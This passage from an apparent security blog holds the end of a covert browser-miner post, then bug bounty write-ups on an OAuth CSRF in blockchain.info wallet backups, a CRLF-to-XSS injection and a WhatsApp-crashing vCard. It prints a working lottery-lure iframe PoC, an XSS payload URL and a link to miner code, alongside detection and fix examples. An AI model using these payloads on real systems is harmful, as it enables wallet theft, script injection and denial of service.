Where Gchrome.exe is your portable Chrome executable in the current directory; or simply put the full path of your chrome.exe there.<br />
<br />
Now many readers will wonder why I wrote Python code for the Windows miner at all, since Windows systems don't have Python installed by default.<br />
<br />
Because I am not good with C and C++, and I found py2exe. Tried and tested on my system, works like a charm!<br />
<br />
Go to "http://py2exe.net" and get your executable.<br />
<br />
Now comes the final question! How do I stop hackers from stealing my CPU resources for their benefit?<br />
<br />
My answer is: feel your loving PC <3. If you find your system fans running all the time even though you are not performing a heavy task, go to your task manager and check whether an unusual program is using all the remaining CPU.<br />
<br />
If you see a sudden spike in CPU usage on your server, use the "top" command in your server terminal to check whether an unwanted program is using your CPU.<br />
<br />
The best part, from the attacker's side, is that since everything happens inside a browser with plain JavaScript, it will go undetected by most antivirus products. (Ad blockers and, since 2019, Firefox's built-in cryptomining protection do block known miner scripts such as Coinhive's; a copy hosted on an unknown domain still slips past those lists.)<br />
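<br />
The manual check above can be scripted. The following is an added example (not from the post): it parses the output of "ps -eo pid,pcpu,etimes,args" on Linux (a constructed sample is embedded so it runs offline) and flags processes that have been hot for a long time while carrying the marks of a hidden browser: headless flags, the -marionette switch geckodriver launches Firefox with, Xvfb, PhantomJS or a known miner script name. The thresholds and the marker list are assumptions to tune per host.<br />

```python
"""Added example, not from the post: the 'top' / Task Manager check turned
into a script.  Parses `ps -eo pid,pcpu,etimes,args` output (Linux procps;
a constructed sample is embedded so it runs offline) and flags processes
that have burned CPU for a long time while carrying the marks of a hidden
browser.  Thresholds and the marker list are assumptions."""
import subprocess

HIDDEN_BROWSER_MARKERS = (
    "--headless", "-marionette", "xvfb", "phantomjs", "geckodriver",
    "coinhive.min.js",
)

# Constructed sample: init, sshd, a Selenium-driven Firefox on a virtual
# display, a short build job and a freshly started headless Chrome.
SAMPLE_PS = """\
  PID %CPU ELAPSED COMMAND
    1  0.0   86400 /sbin/init
  842  0.1   86000 /usr/sbin/sshd -D
 2208  0.3    7325 Xvfb :1001 -screen 0 1024x768x24
 2210 97.3    7320 /usr/lib/firefox/firefox -marionette -profile /tmp/rust_mozprofile
 2305 88.0     300 /usr/bin/python3 /home/user/build.py
 2400 95.0      20 /opt/google/chrome/chrome --headless --disable-gpu http://www.yourwebsite.com/file.html
"""


def parse_ps(text):
    """Turn `ps -eo pid,pcpu,etimes,args` output into dicts; skips the header."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, pcpu, elapsed, cmd = parts
        rows.append({"pid": int(pid), "cpu": float(pcpu),
                     "elapsed": int(elapsed), "cmd": cmd})
    return rows


def suspicious_miners(rows, cpu_threshold=80.0, min_elapsed=600):
    """Return (likely, review): pids hot for at least `min_elapsed` seconds
    that look like a hidden browser, and hot pids with no marker, which a
    human should still eyeball as the post suggests."""
    likely, review = [], []
    for row in rows:
        hot = row["cpu"] >= cpu_threshold and row["elapsed"] >= min_elapsed
        if not hot:
            continue
        cmd = row["cmd"].lower()
        if any(marker in cmd for marker in HIDDEN_BROWSER_MARKERS):
            likely.append(row["pid"])
        else:
            review.append(row["pid"])
    return likely, review


def scan_live_system():
    """Run the real ps (Linux) and apply the same rule."""
    out = subprocess.run(["ps", "-eo", "pid,pcpu,etimes,args"],
                         capture_output=True, text=True, check=True).stdout
    return suspicious_miners(parse_ps(out))


if __name__ == "__main__":
    print(suspicious_miners(parse_ps(SAMPLE_PS)))   # ([2210], [])
```

The runtime threshold is what keeps a developer's short-lived headless test run out of the list; a miner planted the way this post describes runs from boot until shutdown. Anything hot but unmarked goes to the second list for a human to look at, which is the task manager advice above in code.<br />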
<br />
All the source code can be found here<br />
<a href="https://github.com/Shashank-In/silent-monero-miner">https://github.com/Shashank-In/silent-monero-miner</a><br />
<br />
Stay safe ;-)<br />
Cheers Shashank<br />
<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-5428112877288188912017-11-11T20:09:00.000+05:302019-08-17T15:45:00.303+05:30Stealing bitcoin wallet backups from blockchain.info<div dir="ltr" style="text-align: left;" trbidi="on">
Oauth, where many bugs arise :)<br />
<br />
This was one of my findings for the bug bounty program of blockchain.info, where I was able to steal anyone's bitcoin wallet backup from their <a href="http://blockchain.info/">blockchain.info</a> account with negligible user interaction.<br />
<br />
<br />
If you want to know what this wallet backup feature was for, you can check here.<br />
<br />
<blockquote class="tr_bq">
<a href="https://blog.blockchain.com/2014/06/12/tutorial-backup-basics-the-best-ways-to-backup-your-blockchain-wallet/">https://blog.blockchain.com/2014/06/12/tutorial-backup-basics-the-best-ways-to-backup-your-blockchain-wallet/</a></blockquote>
<br />
[P.S This feature has been removed after the bug was reported. Sad! ]<br />
<br />
So basically it created a JSON file which was a backup of your wallet, which you could<br />
download, email to yourself or store directly in your Google Drive or Dropbox account. The bad part was that if someone else got hold of your JSON file, he could simply import it at blockchain.info and steal all your bitcoins.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-mpBLfjAWFWI/WgLKy4Zc2hI/AAAAAAAADrA/oLyJBts5Tc8NJLBd_IesmZGfBWylrREZgCLcBGAs/s1600/Wallet-Backup.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="131" data-original-width="608" height="136" src="https://3.bp.blogspot.com/-mpBLfjAWFWI/WgLKy4Zc2hI/AAAAAAAADrA/oLyJBts5Tc8NJLBd_IesmZGfBWylrREZgCLcBGAs/s640/Wallet-Backup.png" width="640" /></a></div>
<br />
<br />
Now, the bug was in the implementation of storing it directly to Dropbox and Google Drive.<br />
<br />
<br />
I noticed that once you click the Dropbox or Google Drive button, you are asked to log in with your Dropbox or Google account, and once it is authorized, blockchain.info automatically stores the backup file in your Dropbox or Google Drive using your access token.<br />
<br />
<br />
When I looked more closely at all the requests, I found that at the end of a Google Drive authorization the redirect URI looked something like this:<br />
<br />
<br />
<blockquote class="tr_bq">
<span style="background-color: white; color: #6b7272; font-family: "post grotesk" , "helvetica neue" , "arial" , sans-serif; font-size: 14px;">https://blockchain.info/wallet/gdrive-update?code={YourGdriveToken}</span></blockquote>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-TuJufAqSK6U/WgLSdIIqFgI/AAAAAAAADrQ/x9MHTYE_z5shyetleuX5TW7deQoOS0fogCLcBGAs/s1600/blockchain.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="682" data-original-width="1600" height="272" src="https://1.bp.blogspot.com/-TuJufAqSK6U/WgLSdIIqFgI/AAAAAAAADrQ/x9MHTYE_z5shyetleuX5TW7deQoOS0fogCLcBGAs/s640/blockchain.PNG" width="640" /></a></div>
<br />
<br />
Noticed something bad? No CSRF token yay!!!! The value of <b>code</b> is the OAuth authorization code that blockchain.info exchanges for a Drive access token, and nothing ties the callback to the session that started the flow: the OAuth <b>state</b> parameter, which exists for exactly this purpose, is missing.<br />
<br />
<br />
So all I had to do was<br />
1) authenticate my own Google account at blockchain.info,<br />
2) grab the code from my own redirect, intercepting it before my browser completed the request (authorization codes are single-use and short-lived), and<br />
3) send the link below to a victim:<br />
<blockquote class="tr_bq">
<span style="background-color: white; color: #6b7272; font-family: "post grotesk" , "helvetica neue" , "arial" , sans-serif; font-size: 14px;">https://blockchain.info/wallet/gdrive-update?code={MYGdriveToken}</span></blockquote>
4) Once the victim, logged in to blockchain.info, opens the link, his bitcoin wallet backup is stored in my Google Drive account.<br />
<br />
But a normal CSRF link is boring, so clickjacking-style framing will serve as a catalyst for our attack: a hidden iframe fires the request the moment the victim opens the page, no click needed :)<br />
<br />
Although the rest of the website had clickjacking protection, this URL was frameable.<br />
<br />
<br />
So final POC<br />
<br />
<blockquote class="tr_bq">
<html><br />
<head><br />
<title>Some fancy bitcoin lottery page</title><br />
</head><br />
<body><br />
<p>You won a lottery just open this page when you are logged in to blockchain.info and amount will be credited to you </p><br />
<iframe sandbox="allow-scripts allow-forms" src="https://blockchain.info/wallet/gdrive-update?code={Attackers Gdrive Token}" style="width:1%;height:1%"></iframe><br />
</body><br />
</html></blockquote>
<br />
Once the victim lands on the page, the hidden iframe loads and the wallet backup is stored in the attacker's Google Drive.<br />
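<br />
What the fix looks like, as an added example (not blockchain.info's code): an OAuth callback modelled with an in-memory session. The vulnerable handler does what the post describes and accepts any code; the hardened one binds the callback to the session that started the flow through the OAuth state parameter and refuses to be framed. The function names, client_id and scope are placeholders.<br />

```python
"""Added example, not blockchain.info's code: the two controls whose
absence made the gdrive-update callback abusable, modelled with an
in-memory session dict and hypothetical function names.  client_id and
scope are placeholder values."""
import hmac
import secrets
from urllib.parse import urlencode

GOOGLE_AUTH = "https://accounts.google.com/o/oauth2/v2/auth"
CALLBACK = "https://blockchain.info/wallet/gdrive-update"


def start_drive_link(session):
    """Mint a one-time `state`, keep it in the user's own session, and build
    the authorization URL; Google echoes `state` back unchanged."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    params = {"client_id": "example-client-id",            # placeholder
              "redirect_uri": CALLBACK,
              "response_type": "code",
              "scope": "https://www.googleapis.com/auth/drive.file",
              "state": state}
    return f"{GOOGLE_AUTH}?{urlencode(params)}"


def vulnerable_callback(session, params, store_backup):
    """What the post found: whoever supplied `code`, the logged-in user's
    wallet backup is pushed to the Drive that code belongs to."""
    store_backup(session["user"], params["code"])
    return 200, {}


def hardened_callback(session, params, store_backup):
    """Reject any callback this session did not start; deny framing so the
    hidden-iframe PoC cannot even load the URL."""
    headers = {"X-Frame-Options": "DENY",
               "Content-Security-Policy": "frame-ancestors 'none'"}
    expected = session.pop("oauth_state", None)          # single use
    supplied = params.get("state", "")
    if (expected is None or not supplied.isascii()
            or not hmac.compare_digest(expected, supplied)):
        return 403, headers
    store_backup(session["user"], params["code"])
    return 200, headers


def simulate_attack(callback):
    """Attacker obtains a code for HIS Drive, then the victim's browser hits
    the callback with it (the link or the iframe from the post)."""
    uploads = []
    victim_session = {"user": "victim"}
    attacker_code = "4/attacker-authorization-code"       # constructed
    status, _ = callback(victim_session, {"code": attacker_code},
                         lambda user, code: uploads.append((user, code)))
    return status, uploads
```

The attacker cannot produce a valid state for the victim because it is minted in, and compared against, the victim's own session, and Google returns it unchanged; popping it on use also stops replay. The frame-ancestors 'none' header is what would have broken the iframe PoC even if the state check were missing.<br />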
<br />
Bounty?<br />
Yes<br />
<br />
1600$<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-SJOQpR4bbF8/WgLTiYXwYJI/AAAAAAAADrY/sZi-jS8LxXUVJ7Wb6xbgwjXTCBYK26T9ACLcBGAs/s1600/Screen%2BShot%2B2017-11-08%2Bat%2B3.01.41%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="1592" height="260" src="https://1.bp.blogspot.com/-SJOQpR4bbF8/WgLTiYXwYJI/AAAAAAAADrY/sZi-jS8LxXUVJ7Wb6xbgwjXTCBYK26T9ACLcBGAs/s640/Screen%2BShot%2B2017-11-08%2Bat%2B3.01.41%2BPM.png" width="640" /></a></div>
<br />
<br />
They fixed the bug very quickly, and blockchain.info really does take its security seriously. Unfortunately, after I reported this issue, they took down the backup feature for good. Sorry for breaking the backup feature.<br />
<br />
Cheers<br />
Shashank :)<br />
<br />
<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-41118513630243918302017-11-05T14:08:00.000+05:302019-08-17T15:45:32.044+05:30CRLF injection in blockchain.info<div dir="ltr" style="text-align: left;" trbidi="on">
I reported this bug to blockchain.info through their bug bounty program.<br />
<br />
For those who don't know about <a href="https://blockchain.info/" rel="nofollow" target="_blank">blockchain.info</a><br />
<br />
"Blockchain.info is one of the world's most popular Bitcoin wallets and provides detailed information and charts on all Bitcoin transactions and blocks."<br />
<br />
<b>Understanding CRLF injection </b><br />
<b><br /></b> CRLF stands for Carriage Return and Line Feed: two non-printable ASCII control characters, CR (ASCII 13, written \r) and LF (ASCII 10, written \n), which together mark the end of a line in HTTP.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-8q2rvoiFfBA/WfiHq600VRI/AAAAAAAADqA/eg0jWmoI9twKQXzrnjtH4o7A2PbSclhGgCLcBGAs/s1600/Screen%2BShot%2B2017-10-31%2Bat%2B7.54.05%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="380" data-original-width="1258" height="192" src="https://4.bp.blogspot.com/-8q2rvoiFfBA/WfiHq600VRI/AAAAAAAADqA/eg0jWmoI9twKQXzrnjtH4o7A2PbSclhGgCLcBGAs/s640/Screen%2BShot%2B2017-10-31%2Bat%2B7.54.05%2BPM.png" width="640" /></a></div>
<br />
<br />
<br />
Now let's understand how CRLF is used in HTTP requests<br />
<br />
Whenever we open a website, click on something in it or do anything at all, a request is generated by the browser and a response is sent back from the server, which in turn displays the page to us.<br />
<br />
For example, when we request blog.shashank.co in our browser, an HTTP request is sent:<br />
<blockquote class="tr_bq">
http://blog.shashank.co/<br />
GET / HTTP/1.1<br />
Host: blog.shashank.co<br />
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Accept-Encoding: gzip, deflate<br />
Connection: keep-alive<br />
Upgrade-Insecure-Requests: 1</blockquote>
<br />
And a response is sent from the server.<br />
<br />
<blockquote class="tr_bq">
HTTP/1.1 200 OK<br />
Content-Type: text/html; charset=UTF-8<br />
Expires: Tue, 31 Oct 2017 14:28:13 GMT<br />
Date: Tue, 31 Oct 2017 14:28:13 GMT<br />
Cache-Control: private, max-age=0<br />
Last-Modified: Tue, 31 Oct 2017 14:26:43 GMT<br />
ETag: W/"bf427f6283ea846b52644bb883f50252d472a65378d019392f78d16d43fe2f17"<br />
Content-Encoding: gzip<br />
X-Content-Type-Options: nosniff<br />
X-XSS-Protection: 1; mode=block<br />
Content-Length: 13871<br />
Server: GSE</blockquote>
<blockquote class="tr_bq">
<HERE IS THE WEBSITE BODY> </blockquote>
<br />
If you are wondering how I dumped these headers: install the "LiveHTTPHeaders" add-on for Firefox, or simply open the developer tools in your browser and switch to the "Network" tab to see every request being sent while you browse a website.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-evd2MdIOux8/WfiJ_M9sY4I/AAAAAAAADqM/SNkTYeJw1c0mMxmEtoMZGgjNHoYwgiRdwCLcBGAs/s1600/Screen%2BShot%2B2017-10-31%2Bat%2B8.04.06%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1096" data-original-width="1530" height="457" src="https://4.bp.blogspot.com/-evd2MdIOux8/WfiJ_M9sY4I/AAAAAAAADqM/SNkTYeJw1c0mMxmEtoMZGgjNHoYwgiRdwCLcBGAs/s640/Screen%2BShot%2B2017-10-31%2Bat%2B8.04.06%2BPM.png" width="640" /></a></div>
<br />
<br />
Now, every header line of an HTTP message is terminated by a CRLF (as said, a non-printable pair of ASCII characters), and an empty line, i.e. two CRLFs in a row, separates the headers from the body. So it is something like this:<br />
<br />
<blockquote class="tr_bq">
<br />
GET / HTTP/1.1 <b>[CRLF]</b><br />
Host: blog.shashank.co <b>[CRLF]</b><br />
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 <b>[CRLF]</b><br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 <b>[CRLF]</b><br />
Accept-Language: en-US,en;q=0.5 <b>[CRLF]</b><br />
Accept-Encoding: gzip, deflate <b>[CRLF]</b><br />
Connection: keep-alive <b>[CRLF]</b><br />
Upgrade-Insecure-Requests: 1 <b>[CRLF]</b></blockquote>
<br />
<blockquote class="tr_bq">
HTTP/1.1 200 OK <b>[CRLF]</b><br />
Content-Type: text/html; charset=UTF-8 <b>[CRLF]</b><br />
Expires: Tue, 31 Oct 2017 14:28:13 GMT <b>[CRLF]</b><br />
Date: Tue, 31 Oct 2017 14:28:13 GMT<b> [CRLF]</b><br />
Cache-Control: private, max-age=0<b> [CRLF]</b><br />
Last-Modified: Tue, 31 Oct 2017 14:26:43 GMT <b>[CRLF]</b><br />
ETag: W/"bf427f6283ea846b52644bb883f50252d472a65378d019392f78d16d43fe2f17" <b>[CRLF]</b><br />
Content-Encoding: gzip<b> [CRLF]</b><br />
X-Content-Type-Options: nosniff <b>[CRLF]</b><br />
X-XSS-Protection: 1; mode=block <b>[CRLF]</b><br />
Content-Length: 13871 <b>[CRLF]</b><br />
Server: GSE <b>[CRLF] [CRLF]</b></blockquote>
<br />
<blockquote class="tr_bq">
<HERE IS THE BODY></blockquote>
<br />
<b>The bug </b><br />
<b><br /></b> While I was going through the website, I found a place where I could download chart data in JSON and CSV format.<br />
<br />
<blockquote class="tr_bq">
<span style="background-color: white; color: #6b7272; font-family: "post grotesk" , "helvetica neue" , "arial" , sans-serif; font-size: 14px;">https://api2.blockchain.info/charts/total-bitcoins?cors=true&format=csv&lang=en</span></blockquote>
<br />
The last parameter is "lang=en". I thought of playing with it and changed it to "lang=english".<br />
<br />
I noticed a difference in the response headers:<br />
<br />
<blockquote class="tr_bq">
GET /charts/total-bitcoins?cors=true&format=csv&lang=<b>english</b> HTTP/1.1<br />
Host: api.blockchain.info<br />
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Accept-Encoding: gzip, deflate, br<br />
Connection: keep-alive<br />
Upgrade-Insecure-Requests: 1<br />
HTTP/2.0 200 OK<br />
date: Tue, 31 Oct 2017 15:47:21 GMT<br />
content-type: text/csv; charset=ascii<br />
content-length: 10953<br />
access-control-allow-origin: *<br />
cache-control: public, max-age=60<br />
content-disposition: attachment; filename="total-bitcoins.csv"<br />
content-language: <b>english</b><br />
<removed></blockquote>
<br />
Ok so, the "lang" parameter is being reflected in the "content-language" header. The next step was to check for CRLF injection: whether we can add a CRLF and create our own response headers.<br />
<br />
Now to inject a CRLF, we have to URL encode it. The URL encoding of \r\n is "%0D%0A".<br />
<br />
Upon sending a request<br />
<br />
<blockquote class="tr_bq">
<span style="background-color: white; color: #6b7272; font-family: "post grotesk" , "helvetica neue" , "arial" , sans-serif; font-size: 14px;">https://api2.blockchain.info/charts/total-bitcoins?cors=true&format=csv&lang=en%0ATEST</span></blockquote>
A new header, TEST, appeared in the response.<br />
<br />
So there is a CRLF injection!! And since a response also contains a body, we can even execute JavaScript code (cross-site scripting) to steal cookies or frame a phishing page.<br />
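<p>To show the mechanism behind the "TEST" header, here is an added example (not code from the original post, and not blockchain.info's code) with a hypothetical response builder that mimics the shape of the headers above. It shows the injected header and the attacker-controlled body a lenient parser sees, and the allow-list plus CR/LF guard that stops it:</p>

```python
# Added example, not code from the original post: how a reflected query
# parameter turns into header injection, and the check that stops it.
# The response builder is hypothetical and only mimics the shape of the
# headers shown above.
import re


class HeaderInjection(ValueError):
    """Raised when a value destined for a header carries CR, LF or NUL."""


def build_response_vulnerable(lang: str) -> bytes:
    """Echo the decoded 'lang' parameter straight into content-language."""
    head = (
        "HTTP/1.1 200 OK\r\n"
        "content-type: text/csv; charset=ascii\r\n"
        f"content-language: {lang}\r\n"
        "\r\n"
    )
    return head.encode("latin-1") + b"timestamp,value\n"


def safe_header_value(value: str) -> str:
    """Generic guard: a header field-value may not contain bare CR, LF or NUL."""
    if re.search(r"[\r\n\x00]", value):
        raise HeaderInjection(f"control character in header value: {value!r}")
    return value


def build_response_hardened(lang: str) -> bytes:
    """Same response, but 'lang' must look like a language tag (allow-list),
    and every header value still passes the generic CR/LF guard."""
    if not re.fullmatch(r"[A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*", lang):
        raise HeaderInjection(f"not a language tag: {lang!r}")
    head = (
        "HTTP/1.1 200 OK\r\n"
        "content-type: text/csv; charset=ascii\r\n"
        f"content-language: {safe_header_value(lang)}\r\n"
        "\r\n"
    )
    return head.encode("latin-1") + b"timestamp,value\n"


def parse_response(raw: bytes):
    """Lenient parser in the spirit of browsers: a bare LF ends a header line
    just like CRLF does, which is why %0A alone was enough above.
    Returns (status_line, {header_name: value}, body)."""
    normalised = raw.replace(b"\r\n", b"\n")
    head, _, body = normalised.partition(b"\n\n")
    lines = head.decode("latin-1").split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


# The header names the application itself sends; anything else was injected.
EXPECTED = {"content-type", "content-language"}


def injected_headers(raw: bytes, expected: set = EXPECTED) -> set:
    """Defender's check: which header names in a response did the app not send?"""
    _, headers, _ = parse_response(raw)
    return set(headers) - expected
```

<p>Running <code>injected_headers(build_response_vulnerable("en\nTEST"))</code> returns <code>{"test"}</code>, and a value carrying two line breaks puts attacker text at the start of the body; the hardened builder raises before either happens. Rejecting CR/LF is the minimum; the allow-list is what makes the parameter safe in every header it might later be copied into.</p>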
<br />
<br />
So the final payload<br />
<br />
<blockquote class="tr_bq">
<span style="background-color: white; color: #6b7272; font-family: "post grotesk" , "helvetica neue" , "arial" , sans-serif; font-size: 14px;">https://api2.blockchain.info/charts/total-bitcoins?cors=true&format=csv&lang=en%0AX-XSS-Protection:0%0AContent-Type:text/html%0AContent-Length:35%0A%0A%3Csvg%20onload%3Dalert%28document.domain%29%3E&__cf_waf_tk__=012853002E6loVIOSyqHfdxrvHJ87MshEnZI</span></blockquote>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-gMboR-dL7aQ/WfieYWDA4DI/AAAAAAAADqc/HzyfOqDUa9U7yWIAr1owu81fO3UGV2ERwCLcBGAs/s1600/Screen%2BShot%2B2017-10-31%2Bat%2B9.27.30%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="753" data-original-width="1600" height="299" src="https://4.bp.blogspot.com/-gMboR-dL7aQ/WfieYWDA4DI/AAAAAAAADqc/HzyfOqDUa9U7yWIAr1owu81fO3UGV2ERwCLcBGAs/s640/Screen%2BShot%2B2017-10-31%2Bat%2B9.27.30%2BPM.png" width="640" /></a></div>
<br />
Or a phishing page<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-z7ePgS9cEkA/WfijHs4Iz2I/AAAAAAAADqo/a9YOASmBSqAa6nd8ZGy7_l4tn66sHwrQACLcBGAs/s1600/Screen%2BShot%2B2017-10-31%2Bat%2B9.38.04%2BPM.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://3.bp.blogspot.com/-z7ePgS9cEkA/WfijHs4Iz2I/AAAAAAAADqo/a9YOASmBSqAa6nd8ZGy7_l4tn66sHwrQACLcBGAs/s1600/Screen%2BShot%2B2017-10-31%2Bat%2B9.38.04%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="586" data-original-width="1600" height="234" src="https://3.bp.blogspot.com/-z7ePgS9cEkA/WfijHs4Iz2I/AAAAAAAADqo/a9YOASmBSqAa6nd8ZGy7_l4tn66sHwrQACLcBGAs/s640/Screen%2BShot%2B2017-10-31%2Bat%2B9.38.04%2BPM.png" width="640" /></a></div>
Reward 1600$<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com1tag:blogger.com,1999:blog-499911195830393683.post-51292777610267325632017-10-29T04:39:00.002+05:302019-08-17T15:29:29.273+05:30Crashing anyones Whatsapp on IOS<div dir="ltr" style="text-align: left;" trbidi="on">
This was a bug in iOS as well as WhatsApp, which could allow anyone to permanently crash the WhatsApp of the victim under certain conditions.<br />
<br />
I was playing with my iPhone when I realized that I could create a contact whose "first name" consisted of a very large number of characters. It worked fine, but I had a feeling that handing such a huge string around might trip up some other apps.<br />
<br />
After an hour or so, I opened WhatsApp to check my messages, and it closed suddenly. I opened it again, and the same thing happened. Now I was quick enough to connect the dots. I deleted the contact (with the very big first name), and my WhatsApp was working.<br />
<br />
I thought of reporting it to Apple as well as Facebook, but it was likely to be rejected because it was exploitable only on my own phone. Anyway, what's the point of a bug which is exploitable only on yourself?<br />
<br />
So what's next<br />
<br />
Think ..<br />
Thinkk ..<br />
<br />
Flashback to a few articles on self-XSS that was converted into reflected XSS because the researcher found a way to make it shareable. [Advantage of reading lots of write-ups]<br />
<br />
connecting dotssss....<br />
<br />
Yes, contacts are sharable!!!<br />
<br />
But my own WhatsApp is crashing, so how can I share it???<br />
Hence I can't share the malicious contact with others via WhatsApp. SAD!<br />
<br />
Solution<br />
Share it through other messengers. Slack?<br />
<br />
So here are the steps:-<br />
<br />
1) Create a contact with a huge number of characters.<br />
2) Share it via Slack or any other messenger app.<br />
3) Victim downloads it.<br />
4) Victim imports it as a contact.<br />
5) Ends up screwing his WhatsApp<br />
<br />
Completely boring!!! So many user interactions required huhhh!<br />
<br />
Plus a contact name like this looks suspicious<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-sBswl6IuLp8/WfUB7MLZZWI/AAAAAAAADpI/pDIa_uH24EgN92CVxcKl-aoEf4nKUWzBACLcBGAs/s1600/IMG_0498.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br />
</a><a href="https://1.bp.blogspot.com/-sBswl6IuLp8/WfUB7MLZZWI/AAAAAAAADpI/pDIa_uH24EgN92CVxcKl-aoEf4nKUWzBACLcBGAs/s1600/IMG_0498.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br />
</a><a href="https://1.bp.blogspot.com/-sBswl6IuLp8/WfUB7MLZZWI/AAAAAAAADpI/pDIa_uH24EgN92CVxcKl-aoEf4nKUWzBACLcBGAs/s1600/IMG_0498.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="900" height="400" src="https://1.bp.blogspot.com/-sBswl6IuLp8/WfUB7MLZZWI/AAAAAAAADpI/pDIa_uH24EgN92CVxcKl-aoEf4nKUWzBACLcBGAs/s400/IMG_0498.PNG" width="225" /></a></div>
<br />
<br />
Problems to solve now<br />
1) Lessen the number of user interactions required.<br />
2) Make the screen look less suspicious when the contact is displayed.<br />
<br />
While I was looking for alternatives, I found that contacts can be shared as a .vcf file. Bingo!!!<br />
Now I don't need a phone to share the malicious contact file; I can do it on my laptop.<br />
<br />
And I can add space characters to make the contact look less suspicious. [Problem 2 solved]<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-_u07_Ytg1ZI/WfUQ-v2cYoI/AAAAAAAADpk/0onO5xJ8R3YXMCTKueg7hD2sVbYhMT-JQCLcBGAs/s1600/Screen%2BShot%2B2017-10-29%2Bat%2B4.06.55%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1003" data-original-width="1600" height="400" src="https://4.bp.blogspot.com/-_u07_Ytg1ZI/WfUQ-v2cYoI/AAAAAAAADpk/0onO5xJ8R3YXMCTKueg7hD2sVbYhMT-JQCLcBGAs/s640/Screen%2BShot%2B2017-10-29%2Bat%2B4.06.55%2BAM.png" width="640" /></a></div>
<br />
<br />
What about sharing the malicious .vcf file? AirDrop baby!!!!<br />
<br />
So here's what we are going to do.<br />
<br />
1) Make a ".vcf" file on my MacBook. Here is a sample one<br />
<br />
https://gist.githubusercontent.com/Shashank-In/4ac499e885714c4e2d47b989fce4a775/raw/dbf7ff6cea88395d3d34c2ca6fafe3a7b4e58674/shashank.vcf<br />
<br />
It has 3800 characters in it, with lots of spaces to make it less suspicious when displayed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-fyEN3oYiI44/WfUFD-btBBI/AAAAAAAADpU/nQaE4RJiEx0RMyCXJ7VuW6f3ZrE32Zt6gCLcBGAs/s1600/Screen%2BShot%2B2017-10-29%2Bat%2B4.00.02%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1038" data-original-width="552" height="320" src="https://3.bp.blogspot.com/-fyEN3oYiI44/WfUFD-btBBI/AAAAAAAADpU/nQaE4RJiEx0RMyCXJ7VuW6f3ZrE32Zt6gCLcBGAs/s320/Screen%2BShot%2B2017-10-29%2Bat%2B4.00.02%2BAM.png" width="170" /></a></div>
<br />
Could have made it spicier, like the victim's crush's phone number <3<br />
<br />
2) Start sharing it to people nearby you through AirDrop. A ".vcf" file, when sent through AirDrop, gets automatically imported in a single click when accepted, unlike other messengers, where the person has to manually import it as a contact.<br />
<br />
Once accepted, the number is saved. And the next time the victim opens his/her WhatsApp, WhatsApp will crash.<br />
<br />
My guess at the issue in the background: every time WhatsApp is opened, it perhaps checks for newly added contacts so it can automatically show whether the number is associated with a WhatsApp account. So while looking for new contacts, WhatsApp found our malicious contact, could not handle it, and hence crashed. And this repeats:<br />
WhatsApp is opened > it looks for new contacts > can't handle our malicious contact > crashes<br />
<br />
The victim cannot use his WhatsApp :)<br />
<br />
Wewww<br />
<br />
Video POC<br />
<br />
<br />
Rewards? NO!<br />
Facebook blamed Apple for it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
